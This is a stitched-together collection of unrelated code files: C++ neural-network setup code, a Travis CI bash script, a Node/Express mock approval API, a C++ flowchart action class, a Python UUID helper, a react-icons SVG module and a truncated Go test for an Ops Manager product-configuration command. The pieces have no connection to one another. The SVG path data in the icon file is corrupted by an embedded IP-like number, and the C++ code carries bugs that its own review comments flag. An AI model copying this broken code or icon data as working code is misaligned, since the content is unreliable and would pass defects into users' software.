                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell[k].weight += updatingWeights;
                                } else {
                                    networkDetails[networkCount]->network->m_layer[i][j]->lstm->weightCell[k].weight -= updatingWeights;
                                }
                            }
                            //NOTE(review): networkCount only advances in the LSTM
                            //branch, so ANN/RNN updates keep hitting the same
                            //networkDetails entry -- TODO confirm intent.
                            networkCount += 1;
                        }
                    }
                }
            }
        }
        //Update the ID key if the condition to chance it is met.
        int halfway = 0;
        if (networkDetails.size() % 2 == 0) {
            halfway = networkDetails.size() / 2;
        } else {
            //NOTE(review): the `+ 0.5` truncates in int arithmetic (see above).
            halfway = (networkDetails.size() / 2) + 0.5;
        }
        int count = 0;
        for (int i = 0; i < change.size(); i++) {
            if (change[i] == 1) {
                count += 1;
            }
        }
        //Stagnation tracking: a pass where fewer than half of the networks were
        //marked for change. NOTE(review): `counter` was also used above as the
        //file-enumeration cursor; reusing it here conflates the two meanings.
        if (count < halfway) {
            counter += 1;
        }
        //After 100 stagnant passes, rewrite updatedKey so the loop condition
        //fails and the worker exits. NOTE(review): 65536 does not fit in 16
        //bits, so this yields the all-zero string "0000000000000000" -- 65535
        //was probably intended.
        if (counter == 100) {
            updatedKey = bitset<16>(65536).to_string();
        }
        //Calculates the number of Data Sets processed by the AI.
        for (int i = 0; i < networkDetails.size(); i++) {
            dsProcessedTotal += networkDetails[i]->dataSetsProcessed;
        }
    }
}
//This method sets up the text based Recurrent Neural Network and the video and image CNN's.
void ArtificialIntelligence::setupAI() {
vector<vector<string>> networkGenerator;
vector<vector<string>> audioNetwork;
vector<vector<string>> imageNetwork;
vector<vector<string>> textNetwork;
vector<vector<string>> videoNetwork;
vector<string> layer;
//This creates the neural network for Generating the neural networks.
networkGenerator.push_back(layer);
for (int i = 0; i < 3; i++) {
networkGenerator.back().push_back("ANNBlock");
}
networkGenerator.back().push_back("BIASBlock");
networkGenerator.push_back(layer);
for (int i = 0; i < 4; i++) {
networkGenerator.back().push_back("RNNBlock");
}
networkGenerator.back().push_back("BIASBlock");
networkGenerator.push_back(layer);
for (int i = 0; i < 4; i++) {
networkGenerator.back().push_back("ANNBlock");
}
networkGenerator.back().push_back("BIASBlock");
//This creates the neural network for Audio.
audioNetwork.push_back(layer);
audioNetwork.back().push_back("ANNBlock");
audioNetwork.back().push_back("BIASBlock");
audioNetwork.push_back(layer);
audioNetwork.back().push_back("RNNBlock");
audioNetwork.back().push_back("BIASBlock");
audioNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
for (int j = 0; j < 10; j++) {
audioNetwork.back().push_back("ANNBlock");
}
audioNetwork.back().push_back("BIASBlock");
}
//This creates the neural network for Image.
imageNetwork.push_back(layer);
for (int i = 0; i < 4; i++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
for (int i = 0; i < 2; i++) {
imageNetwork.push_back(layer);
for (int j = 0; j < 4; j++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
}
imageNetwork.push_back(layer);
for (int i = 0; i < 6; i++) {
imageNetwork.back().push_back("ANNBlock");
}
imageNetwork.back().push_back("BIASBlock");
//This creates the neural network for Text.
textNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
textNetwork.back().push_back("ANNBlock");
}
textNetwork.back().push_back("BIASBlock");
textNetwork.push_back(layer);
textNetwork.back().push_back("LSTMBlock");
textNetwork.back().push_back("BIASBlock");
textNetwork.push_back(layer);
for (int i = 0; i < 3; i++) {
textNetwork.back().push_back("ANNBlock");
}
textNetwork.back().push_back("BIASBlock");
//This creates the neural network for Video.
videoNetwork.push_back(layer);
for (int i = 0; i < 4; i++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
for (int i = 0; i < 2; i++) {
videoNetwork.push_back(layer);
for (int j = 0; j < 4; j++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
}
videoNetwork.push_back(layer);
for (int i = 0; i < 6; i++) {
videoNetwork.back().push_back("ANNBlock");
}
videoNetwork.back().push_back("BIASBlock");
//This generates the neural networks and stores them in the AI.
_networkGenerator = new DynamicNetworkGenerator(networkGenerator);
_audioNetwork = new DynamicNetworkGenerator(audioNetwork);
_imageNetwork = new DynamicNetworkGenerator(imageNetwork);
_textNetwork = new DynamicNetworkGenerator(textNetwork);
_videoNetwork = new DynamicNetworkGenerator(videoNetwork);
}
//This creates a new Neural Network for the AI.
void ArtificialIntelligence::addNetwork(int count, vector<vector<string>> networkSetup) {
threadDetails *td = new threadDetails();
td->id = bitset<4>(count).to_string();
td->network = new DynamicNetworkGenerator(networkSetup);
td->active = true;
networkDetails.push_back(td);
}
//This calculates the performance of a network from the AI.
//Returns one genome character per network: '1' when at least 90% of the
//collected data sets have been processed, otherwise '0'.
string ArtificialIntelligence::networkPerformance() {
	string genome = "";
	for (int i = 0; i < networkDetails.size(); i++) {
		double processed = (double)networkDetails[i]->dataSetsProcessed;
		double collected = (double)networkDetails[i]->dataSetsCollected;
		//Floating-point math avoids the integer-division truncation in the old
		//code, which made the comparison against 90.0 almost never succeed.
		//NOTE(review): the 90.0 threshold reads as a percentage, so the ratio
		//is scaled by 100 here — confirm the intended semantics with callers.
		//The collected > 0 check also guards against division by zero.
		if (collected > 0.0 && (processed / collected) * 100.0 >= 90.0) {
			genome += "1";
		} else {
			genome += "0";
		}
	}
	return genome;
}
|
#!/bin/bash
# ********************
# Run Funceble Testing
# ********************
# ****************************************************************
# This uses the awesome funceble script created by Nissar Chababy
# Find funceble at: https://github.com/funilrys/funceble
# ****************************************************************
# All variable expansions are quoted to survive paths containing
# spaces (shellcheck SC2086), and cd failure aborts the script
# instead of running the remaining commands in the wrong directory
# (shellcheck SC2164).
# ******************
# Set our Input File
# ******************
_input="$TRAVIS_BUILD_DIR/.dev-tools/_input_source/bad-referrers.list"
# *********************************
# Make scripts executable by Travis
# *********************************
sudo chmod +x "$TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool"
sudo chmod +x "$TRAVIS_BUILD_DIR/.dev-tools/_funceble/funceble"
# *******************************************
# Make Sure We Are In The Travis Build Folder
# *******************************************
cd "$TRAVIS_BUILD_DIR/.dev-tools/_funceble/" || exit 1
# *************************
# Run Funceble Install Tool
# *************************
YEAR=$(date +%Y)
MONTH=$(date +%m)
sudo bash "$TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool" --dev -u --autosave-minutes 10 --commit-autosave-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER} [funceble]" --commit-results-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER}" -i
# sudo bash $TRAVIS_BUILD_DIR/.dev-tools/_funceble/tool --autosave-minutes 40 --commit-autosave-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER} [funceble]" --commit-results-message "V1.${YEAR}.${MONTH}.${TRAVIS_BUILD_NUMBER}" -i
# ************************************
# Run Funceble and Check Domains List
# ************************************
sudo bash "$TRAVIS_BUILD_DIR/.dev-tools/_funceble/funceble" --cmd-before-end "bash $TRAVIS_BUILD_DIR/.dev-tools/final-commit.sh" --travis -a -ex -h --plain --split -f "$_input"
exit 0
|
<gh_stars>1-10
//Process list: returns the full approval-process list file as JSON.
router.route('/spms/approve/approve/')
    .all(function (req, res, next) {
        next();
    })
    .get(function (req, res, next) {
        res.writeHead(200, { 'Content-Type': 'application/json' });
        var data = fs.readFileSync('routers/files/process-list.json');
        //JSON.parse replaces eval: the file is written via JSON.stringify
        //elsewhere in this router, and eval on file contents is a
        //code-injection risk.
        res.end(JSON.stringify(JSON.parse(data)));
        next();
    })
//Start a new approval process: assigns a random id, prepends the submission
//to the stored process list, and echoes the apply_form back to the caller.
router.route('/spms/approveapply/submit/')
    .all(function (req, res, next) {
        next();
    })
    .post(function (req, res, next) {
        //Pseudo-random numeric id built from three 0-99 segments.
        var id = parseInt(Math.random(0, 100) * 100) + '' + parseInt(Math.random(0, 100) * 100) + '' + parseInt(Math.random(0, 100) * 100);
        var Backdatas = {};
        req.on('data', function (data) {
            //JSON.parse replaces eval: evaluating request bodies is a
            //code-injection risk.
            var datas = JSON.parse(data);
            datas['id'] = id;
            Backdatas = _.clone(datas['apply_form']);
            Backdatas.id = id;
            var DataList = JSON.parse(fs.readFileSync('routers/files/process-list.json'));
            var newData = _.clone(DataList["data"]['item']['approvelist']);
            newData.unshift(datas);
            DataList['data']['item']['approvelist'] = newData;
            //Persist asynchronously; the response does not wait for the write.
            fs.writeFile('routers/files/process-list.json', JSON.stringify(_.clone(DataList)), function (err) {
                if (err) console.log(err)
            })
            res.writeHead(200, { 'Content-Type': 'application/json' });
            res.end(JSON.stringify({ code: 0, data: { item: Backdatas }, systime: Date.parse(new Date()) }));
            next()
        })
    })
//Read a single approval process by id (GET) or update it in place (PUT).
router.route('/spms/approveapply/submit/:id')
    .all(function (req, res, next) {
        next();
    })
    .get(function (req, res, next) {
        var url = req.url.split('/');
        var id = url[url.length - 1];
        res.writeHead(200, { 'Content-Type': 'application/json' });
        //JSON.parse replaces eval: the file is JSON written via JSON.stringify.
        var datas = JSON.parse(fs.readFileSync('routers/files/process-list.json'));
        _.each(datas["data"]["item"]['approvelist'], function (item) {
            if (id == item["id"]) {
                res.end(JSON.stringify({ code: 0, data: { item: item }, systime: Date.parse(new Date()) }));
                next();
            }
        })
    })
    .put(function (req, res, next) {
        var url = req.url.split('/');
        var id = url[url.length - 1];
        var Backdatas = {};
        req.on('data', function (data) {
            //JSON.parse replaces eval on the request body (code-injection risk).
            var datas = JSON.parse(data);
            var DataList = JSON.parse(fs.readFileSync('routers/files/process-list.json'));
            var nowData = _.clone(DataList['data']['item']['approvelist']);
            //Merge the incoming fields into the matching stored record.
            _.each(nowData, function (item) {
                if (item["id"] == datas["id"]) {
                    _.extend(item, datas)
                }
            })
            DataList['data']['item']['approvelist'] = nowData
            Backdatas = _.clone(datas);
            //Persist asynchronously; the response does not wait for the write.
            fs.writeFile('routers/files/process-list.json', JSON.stringify(_.clone(DataList)), function (err) {
                if (err) console.log(err)
            })
            res.writeHead(200, { 'Content-Type': 'application/json' });
            res.end(JSON.stringify({ code: 0, data: { item: Backdatas }, systime: Date.parse(new Date()) }));
            next()
        })
    })
//Read the approval record list for a process.
router.route('/spms/approve/record/')
    .all(function (req, res, next) {
        next();
    })
    .get(function (req, res, next) {
        res.writeHead(200, { 'Content-Type': 'application/json' });
        var data = fs.readFileSync('routers/files/process-record-list.json');
        //JSON.parse replaces eval on file contents (code-injection risk);
        //the old unused url/id/datas locals were dropped.
        res.end(JSON.stringify(JSON.parse(data)));
        next();
    })
//Approve or send back a process: prepends the decision to the record list
//and echoes it back to the caller.
router.route('/spms/approve/approve')
    .all(function (req, res, next) {
        next();
    })
    .post(function (req, res, next) {
        //Pseudo-random numeric id built from three 0-99 segments.
        var id = parseInt(Math.random(0, 100) * 100) + '' + parseInt(Math.random(0, 100) * 100) + '' + parseInt(Math.random(0, 100) * 100);
        req.on('data', function (data) {
            //JSON.parse replaces eval on the request body (code-injection risk).
            var datas = JSON.parse(data);
            datas['id'] = id;
            var DataList = JSON.parse(fs.readFileSync('routers/files/process-record-list.json'));
            var newData = _.clone(DataList["data"]['list']);
            newData.unshift(datas);
            DataList['data']['list'] = newData
            var Backdatas = _.clone(datas)
            //Persist asynchronously; the response does not wait for the write.
            fs.writeFile('routers/files/process-record-list.json', JSON.stringify(_.clone(DataList)), function (err) {
                if (err) console.log(err)
            })
            //The response is sent from inside the 'data' handler: the old code
            //responded synchronously before the request body had arrived, so
            //the echoed payload was always an empty object.
            res.writeHead(200, { 'Content-Type': 'application/json' });
            res.end(JSON.stringify({ code: 0, data: Backdatas, systime: Date.parse(new Date()) }));
            next()
        })
    })
//Check whether a draft exists. Basic info and planned tasks have no drafts.
//hasdraft codes: 0 = none; 1 = project draft; 2 = task-plan draft.
router.route('/spms/project/:id/hasdraft')
    .all(function (req, res, next) {
        next();
    })
    .get(function (req, res, next) {
        var payload = {
            code: 0,
            data: { item: { id: 'testpid', hasdraft: 1 } },
            systime: Date.parse(new Date())
        };
        res.end(JSON.stringify(payload));
        next();
    })
|
<gh_stars>0
#include "Add_Write_Stat.h"
#include"..\Statements\Write_Stat.h"
//Constructs the action with empty statement text and default flags:
//the statement is drawable and has not been undone yet.
Add_Write_Stat::Add_Write_Stat(ApplicationManager *pAppManager)
	:Action(pAppManager)
{
	redo = false;
	draw = true;
	txt = "";
}
//Interactively reads the write statement's text and placement from the user.
//On success, 'txt' holds "Print " plus the identifiers, and the geometry
//members (width, height, t_width, t_height, factor) are filled in.
//The sentinel value "Print " in 'txt' marks an aborted or empty statement.
void Add_Write_Stat::ReadActionParameters()
{
	Output *pOut = pManager->GetOutput();
	Input *pIn = pManager->GetInput();
	pOut->PrintMessage("writing Statement: Click to add the statement");
	//A failed click aborts the action; the caller detects this via the sentinel.
	if (!pIn->GetPointClicked(inlet)){
		txt = "Print ";
		return;
	}
	pOut->PrintMessage("now enter the variables that will be read from the user in this way Iden1,Iden2,..");
	txt = "Print " + pIn->GetIdentifiers(txt, pOut, v1);
	//No identifiers entered: leave the sentinel in place and bail out.
	if (txt == "Print ")
		return;
	pIn->set_Read_Write_Dim(txt, width, height, t_width, t_height, factor); //for setting the dimensions of the statement
	//width,height,t_width,t_height are passed by reference to be calculated then returned
	Point lcorner;
	pIn->calc_Read_corner(inlet, lcorner, width, factor);
	int count = 0;
	string str;
	//Re-prompt while the spot is not drawable (up to 11 tries) or the shape
	//would intersect a connector; each retry asks for a new click position.
	while ((!pIn->candraw(lcorner, pManager, height, width) && count != 11) || (pIn->intersect_with_connector(height, width, lcorner, pManager))){
		str = to_string(count);
		pOut->PrintMessage("choose another position to draw Error counter:" + str + " becareful error count max =10");
		if (!pIn->GetPointClicked(inlet)){
			txt = "Print ";
			return;
		}
		pIn->calc_Read_corner(inlet, lcorner, width, factor);
		count++;
		//Remember whether the latest position is drawable; Execute() rejects
		//the statement when this ends up false.
		draw = pIn->candraw(lcorner, pManager, height, width);
	}
	if (count != 11)
		pOut->PrintMessage("statement added correctly");
}
//Runs the full add-write-statement interaction: reads the user's input and,
//if valid, creates the Write_Stat and registers it with the manager.
void Add_Write_Stat::Execute()
{
	//The unused Input* local from the old code was removed.
	Output *pOut = pManager->GetOutput();
	ReadActionParameters();
	//An empty statement (sentinel "Print ") or an unplaceable one is rejected.
	if (txt == "Print " || !draw){
		pOut->PrintMessage("the statement is empty, this isn't allowed try to add again");
		SetUndo(false);
		return;
	}
	//Create the statement with the geometry computed in ReadActionParameters.
	write = new Write_Stat(pManager, txt, inlet, v1, width, height, t_width, t_height, factor);
	pManager->AddStatement(write);
}
//Toggles the effect of this action: the first call removes the created
//statement, the next call re-inserts it, and so on.
void Add_Write_Stat::undo()
{
	if (redo){
		//Currently undone: put the statement back (redo).
		pManager->AddStatement(write);
	}
	else{
		//Currently applied: take the statement out (undo).
		pManager->RemoveStatment(write);
	}
	redo = !redo;
}
|
import uuid
def generateUniqueId():
    """Return a freshly generated random UUID (version 4) as a string."""
    fresh_id = uuid.uuid4()
    return str(fresh_id)
# Demo: generate one unique id at import time and print it.
uniqueId = generateUniqueId()
print(uniqueId)
|
<filename>node_modules/react-icons-kit/md/ic_directions_outline.js<gh_stars>0
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ic_directions_outline = void 0;
var ic_directions_outline = {
"viewBox": "0 0 24 24",
"children": [{
"name": "path",
"attribs": {
"d": "M0 0h24v24H0V0z",
"fill": "none"
},
"children": []
}, {
"name": "path",
"attribs": {
"d": "M22.43 10.59l-9.01-9.01c-.75-.75-2.07-.76-2.83 0l-9 9c-.78.78-.78 2.04 0 2.82l9 9c.39.39.9.58 192.168.127.12 0 1.02-.19 1.41-.58l8.99-8.99c.79-.76.8-2.02.03-2.82zm-10.42 10.4l-9-9 9-9 9 9-9 9zM8 11v4h2v-3h4v2.5l3.5-3.5L14 7.5V10H9c-.55 0-1 .45-1 1z"
},
"children": []
}]
};
exports.ic_directions_outline = ic_directions_outline;
|
package commands_test
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/pivotal-cf/om/api"
"github.com/pivotal-cf/om/commands"
"github.com/pivotal-cf/om/commands/fakes"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("ConfigureProduct", func() {
Describe("Execute", func() {
var (
service *fakes.ConfigureProductService
logger *fakes.Logger
config string
configFile *os.File
err error
)
BeforeEach(func() {
service = &fakes.ConfigureProductService{}
logger = &fakes.Logger{}
})
JustBeforeEach(func() {
configFile, err = ioutil.TempFile("", "config.yml")
Expect(err).ToNot(HaveOccurred())
defer configFile.Close()
_, err = configFile.WriteString(config)
Expect(err).ToNot(HaveOccurred())
})
When("product properties are provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "product-properties": %s}`, productProperties)
})
It("configures the given product's properties", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting properties"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting properties"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
It("check configuration is complete after configuring", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "example.com", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedPendingChangesReturns(api.PendingChangesOutput{
ChangeList: []api.ProductChange{
{
GUID: "some-product-guid",
Action: "install",
Errands: nil,
CompletenessChecks: &api.CompletenessChecks{
ConfigurationComplete: false,
StemcellPresent: false,
ConfigurablePropertiesValid: true,
},
},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError("configuration not complete.\nThe properties you provided have been set,\nbut some required properties or configuration details are still missing.\nVisit the Ops Manager for details: example.com"))
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
Expect(service.ListStagedPendingChangesCallCount()).To(Equal(1))
})
It("returns a helpful error message if configuration completeness cannot be validated", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "example.com", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedPendingChangesReturns(api.PendingChangesOutput{
ChangeList: []api.ProductChange{
{
GUID: "some-product-guid",
Action: "install",
Errands: nil,
CompletenessChecks: nil,
},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(HaveOccurred())
Expect(err).To(MatchError("configuration completeness could not be determined.\nThis feature is only supported for OpsMan 2.2+\nIf you're on older version of OpsMan add the line `validate-config-complete: false` to your config file."))
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductPropertiesArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.Properties).To(MatchJSON(productProperties))
Expect(service.ListStagedPendingChangesCallCount()).To(Equal(1))
})
})
When("product network is provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "network-properties": %s}`, networkProperties)
})
It("configures a product's network", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateStagedProductNetworksAndAZsArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.NetworksAndAZs).To(MatchJSON(networkProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting up network"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting up network"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
})
When("product syslog is provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "syslog-properties": %s}`, syslogProperties)
})
It("configures a product's syslog", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
actual := service.UpdateSyslogConfigurationArgsForCall(0)
Expect(actual.GUID).To(Equal("some-product-guid"))
Expect(actual.SyslogConfiguration).To(MatchJSON(syslogProperties))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("setting up syslog"))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished setting up syslog"))
format, content = logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished configuring product"))
})
})
When("product resources are provided", func() {
BeforeEach(func() {
config = fmt.Sprintf(`{"product-name": "cf", "resource-config": %s}`, resourceConfig)
})
It("configures the resource that is provided", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(service.ListStagedProductJobsArgsForCall(0)).To(Equal("some-product-guid"))
Expect(service.ConfigureJobResourceConfigCallCount()).To(Equal(1))
productGUID, userConfig := service.ConfigureJobResourceConfigArgsForCall(0)
Expect(productGUID).To(Equal("some-product-guid"))
payload, err := json.Marshal(userConfig)
Expect(err).ToNot(HaveOccurred())
Expect(payload).To(MatchJSON(`{
"some-job": {
"persistent_disk": {"size_mb": "20480"},
"elb_names": ["some-lb"],
"instance_type": {"id": "m1.medium"},
"instances": 1,
"internet_connected": true,
"max_in_flight": "20%"
},
"some-other-job": {
"persistent_disk": {"size_mb": "20480"},
"instance_type": {"id": "m1.medium"},
"max_in_flight": 1
}
}`))
format, content := logger.PrintfArgsForCall(0)
Expect(fmt.Sprintf(format, content...)).To(Equal("configuring cf..."))
format, content = logger.PrintfArgsForCall(1)
Expect(fmt.Sprintf(format, content...)).To(Equal("applying resource configurations..."))
format, content = logger.PrintfArgsForCall(2)
Expect(fmt.Sprintf(format, content...)).To(Equal("finished applying resource configurations"))
})
It("sets the max in flight for all jobs", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
err := executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.UpdateStagedProductJobMaxInFlightCallCount()).To(Equal(1))
productGUID, payload := service.UpdateStagedProductJobMaxInFlightArgsForCall(0)
Expect(productGUID).To(Equal("some-product-guid"))
Expect(payload).To(Equal(map[string]interface{}{
"a-guid": "20%",
"a-different-guid": 1,
}))
format, content := logger.PrintfArgsForCall(3)
Expect(fmt.Sprintf(format, content...)).To(Equal("applying max in flight for the following jobs:"))
})
})
When("interpolating", func() {
var (
configFile *os.File
err error
)
BeforeEach(func() {
service.ListStagedProductsReturns(api.StagedProductsOutput{
Products: []api.StagedProduct{
{GUID: "some-product-guid", Type: "cf"},
{GUID: "not-the-guid-you-are-looking-for", Type: "something-else"},
},
}, nil)
service.ListStagedProductJobsReturns(map[string]string{
"some-job": "a-guid",
"some-other-job": "a-different-guid",
"bad": "do-not-use",
}, nil)
})
AfterEach(func() {
os.RemoveAll(configFile.Name())
})
When("the config file contains variables", func() {
Context("passed in a vars-file", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
varsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = varsFile.WriteString(`password: <PASSWORD>`)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--vars-file", varsFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
Context("given vars", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--var", "password=<PASSWORD>",
})
Expect(err).ToNot(HaveOccurred())
})
})
Context("passed as environment variables", func() {
It("can interpolate variables into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return []string{"OM_VAR_password=<PASSWORD>"} }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--vars-env", "OM_VAR",
})
Expect(err).ToNot(HaveOccurred())
})
It("supports the experimental feature of OM_VARS_ENV", func() {
os.Setenv("OM_VARS_ENV", "OM_VAR")
defer os.Unsetenv("OM_VARS_ENV")
client := commands.NewConfigureProduct(func() []string { return []string{"OM_VAR_password=<PASSWORD>"} }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
})
})
It("returns an error if missing variables", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(productPropertiesWithVariableTemplate)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
})
Expect(err).To(MatchError(ContainSubstring("Expected to find variables")))
})
})
When("an ops-file is provided", func() {
It("can interpolate ops-files into the configuration", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(ymlProductProperties)
Expect(err).ToNot(HaveOccurred())
opsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = opsFile.WriteString(productOpsFile)
Expect(err).ToNot(HaveOccurred())
err = executeCommand(client, []string{
"--config", configFile.Name(),
"--ops-file", opsFile.Name(),
})
Expect(err).ToNot(HaveOccurred())
Expect(service.ListStagedProductsCallCount()).To(Equal(1))
Expect(service.UpdateStagedProductPropertiesCallCount()).To(Equal(1))
Expect(service.UpdateStagedProductPropertiesArgsForCall(0).GUID).To(Equal("some-product-guid"))
Expect(service.UpdateStagedProductPropertiesArgsForCall(0).Properties).To(MatchJSON(productPropertiesWithOpsFileInterpolated))
})
It("returns an error if the ops file is invalid", func() {
client := commands.NewConfigureProduct(func() []string { return nil }, service, "", logger)
configFile, err = ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
_, err = configFile.WriteString(ymlProductProperties)
Expect(err).ToNot(HaveOccurred())
opsFile, err := ioutil.TempFile("", "")
Expect(err).ToNot(HaveOccurred())
